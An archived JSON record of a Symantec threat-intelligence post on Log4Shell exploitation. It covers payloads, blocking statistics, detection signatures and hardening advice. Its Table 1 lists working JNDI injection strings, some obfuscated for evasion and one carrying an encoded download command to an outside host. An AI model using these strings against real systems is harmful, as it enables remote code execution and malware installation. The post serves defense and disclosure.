{
	"id": "8c5569c5-a0e0-4977-ae3b-daca00aea372",
	"created_at": "2026-04-06T00:08:29.408145Z",
	"updated_at": "2026-04-10T03:23:52.302157Z",
	"deleted_at": null,
	"sha1_hash": "13782a82dbbdf8808a408cb2cacee077d459a56d",
	"title": "Log4j Vulnerabilities: Attack Insights",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 50843,
	"plain_text": "Log4j Vulnerabilities: Attack Insights\r\nArchived: 2026-04-05 23:11:00 UTC\r\nApache Log4j is a Java-based logging utility. The library’s main role is to log information related to security and\r\nperformance to make error debugging easier and to enable applications to run smoothly. The library is part of the Apache\r\nLogging Services, a project of the Apache Software Foundation.\r\nLog4j has been making headlines recently after the public disclosure of three critical vulnerabilities in the utility that can\r\nlead to remote code execution (CVE-2021-44228 and CVE-2021-45046) and denial of service (CVE-2021-45105). The\r\ninitial remote code execution vulnerability (CVE-2021-44228) has been dubbed Log4Shell and has dominated cyber-security news ever since it was publicly disclosed on December 9. The vulnerability has been exploited to deploy a plethora\r\nof payloads like coin miners, Dridex malware, and even ransomware such as Conti.\r\nVariations in attacks\r\nSymantec, a division of Broadcom Software, has observed numerous variations in attack requests primarily aimed at\r\nevading detection. Some sample attack requests can be seen in Table 1.\r\nTable 1. Sample of Log4j vulnerability attack requests\r\nAttack requests\r\n${jndi:ldap://:1389/Exploit}\r\n${jndi:dns://MASKED_IP.1/securityscan-http8085}\r\n${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-\r\nl}dap${env:NaN:-:}//MASKED_IP:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMjA5LjE0MS40Ni4xMTQvcmVhZGVyOyBjdXJsIC\r\n${${lower:${lower:jndi}}:${lower:rmi}://MASKED_IP:1389/Binary}\r\n${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://MASKED_IP:1389/Binary}\r\n${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}MASKED_IP:44${::-3}/${::-o}=${::-t}omca${::-t}}\r\nAttackers are predominantly using the LDAP and RMI protocols to download malicious payloads. 
We have also recorded\r\nvulnerability scans using protocols such as IIOP, DNS, HTTP, NIS etc.\r\nPayloads\r\nMuhstik Botnet - We have observed attackers downloading malicious Java class files as a part of Log4Shell exploitation.\r\nThe malicious class file downloads a shell file with the content shown in Figure 1.\r\nFigure 1. Content of shell file downloaded by malicious class file\r\nThe shell script attempts to download Executable and Linkable Format (ELF) files and execute them, which leads to the\r\ninstallation of the Muhstik botnet.\r\nXMRig miner - We have also observed attackers installing the XMRig cryptocurrency miner as a part of post-exploitation\r\nactivity related to Log4Shell exploitation. The miner is downloaded via a simple PowerShell command (Figure 2).\r\nFigure 2. PowerShell command used to download XMRig miner\r\nThe miner is executed with the command shown in Figure 3.\r\nFigure 3. Command used to execute XMRig miner\r\nMalicious class file backdoor - We have also seen attacks attempt to download a malicious Java class file that acts as a\r\nbackdoor. The class file has code to listen for and execute commands from the attacker (Figure 4).\r\nFigure 4. Code used to listen for and execute commands from attacker\r\nReverse Bash shell - Attackers were also observed deploying reverse shells on vulnerable machines (Figure 5).\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks\r\nPage 1 of 3\n\nFigure 5. 
Code used to deploy reverse shell on vulnerable machines\r\nOther publicly reported payloads include the Khonsari and Conti ransomware threats, the Orcus remote access Trojan\r\n(RAT), and the Dridex malware, among others.\r\nSymantec IPS data\r\nFor the period between December 9 (when the first Log4j vulnerability was disclosed) and December 21, Symantec’s\r\nIntrusion Prevention System (IPS) blocked more than 93 million Log4Shell related exploitation attempts on more than\r\n270,000 unique machines.\r\nFigure 6. Blocked Log4Shell related exploitation attempts against unique machines\r\nDuring the same time frame, IPS blocked more than 18 million Log4Shell related exploitation attempts on more than 60,000\r\nunique server machines.\r\nFigure 7. Blocked Log4Shell related exploitation attempts against servers\r\nThe majority of Log4Shell attacks blocked by Symantec were against machines located in the U.S. and the United Kingdom,\r\nfollowed by Singapore, India, and Australia.\r\nFigure 8. The majority of Log4Shell attacks blocked by Symantec were against machines located in the U.S. and United Kingdom\r\nMeanwhile, the majority of attacks exploiting the Log4j vulnerabilities seem to originate from devices located in the U.S.\r\nand Germany, followed by Russia, the United Kingdom, and China.\r\nFigure 9. The majority of attackers exploiting the Log4j vulnerabilities are located in the U.S. 
and Germany\r\nProtection\r\nBehavior-based\r\nSONAR.Maljava!g7\r\nSONAR.Ransomware!g1\r\nSONAR.Ransomware!g31\r\nSONAR.Ransomware!g32\r\nSONAR.SuspLaunch!g184\r\nSONAR.SuspLaunch!g185\r\nFile-based\r\nCL.Suspexec!gen106\r\nCL.Suspexec!gen107\r\nCL.Suspexec!gen108\r\nLinux.Kaiten\r\nMiner.XMRig!gen2\r\nRansom.Khonsari\r\nRansom.Tellyouthepass\r\nRansom.Tellyouthepa!g1\r\nRansom.Tellyouthepa!g2\r\nTrojan Horse\r\nTrojan.Maljava\r\nMachine learning-based\r\nHeur.AdvML.C\r\nNetwork-based\r\nAudit: Suspicious Java Class File Executing Arbitrary Commands\r\nAudit: Log4j2 RCE CVE-2021-44228\r\nAudit: Malicious LDAP Response\r\nAttack: Log4j2 RCE CVE-2021-44228 2\r\nAttack: Malicious LDAP Response\r\nAttack: Log4j2 RCE CVE-2021-44228\r\nAttack: Log4j CVE-2021-45046\r\nAttack: Log4j CVE-2021-45105\r\nWeb Attack: Malicious Java Payload Download 2\r\nWeb Attack: Malicious Java Payload Download 3\r\nWeb Attack: Malicious Java Payload Download 4\r\nPolicy-based\r\nDCS provides multi-layered protection for Windows, Linux Server workloads, and container applications for this\r\nvulnerability:\r\nSuspicious Process Execution: Prevention policies prevent malware from being dropped or executed on the system.\r\nDCS hardened Linux servers prevent execution of malware from temp or other writable locations, a technique used\r\nby attackers to drop crypto miners such as XMRig in reported Log4Shell exploitation.\r\nReview the Linux proxy execution list for your Log4j-based application sandbox to include additional tools such as\r\n*/curl, */wget. 
These tools are used by attackers to connect from the victim Log4j application to external command-and-control servers for downloading additional payloads.\r\nDCS sandboxing of Windows and Linux applications prevents suspicious program execution using living-off-the-land\r\ntools and tampering with critical system services and resources.\r\nNetwork Control: Block outgoing connections to the public internet and limit required LDAP, HTTP, and other\r\ntraffic from server workloads and containerized applications using Log4j2 to internal trusted systems.\r\nDetection Policies: System Attack detection: The Baseline_WebAttackDetection_Generic_MaliciousUserAgent rule\r\nshould be updated to include the *jndi:* select string so that it alerts on malicious server requests containing suspicious JNDI\r\nlookup attempts such as jndi:ldap, jndi:rmi, and jndi:dns. Make sure to set the path to your web server access log file in\r\nthe IDS Web Attack Detection option. Similar custom text log rules should be added for each of your Log4j\r\napplication log files.\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks"
	],
	"report_names": [
		"log4j-vulnerabilities-attacks"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434109,
	"ts_updated_at": 1775791432,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/13782a82dbbdf8808a408cb2cacee077d459a56d.pdf",
		"text": "https://archive.orkl.eu/13782a82dbbdf8808a408cb2cacee077d459a56d.txt",
		"img": "https://archive.orkl.eu/13782a82dbbdf8808a408cb2cacee077d459a56d.jpg"
	}
}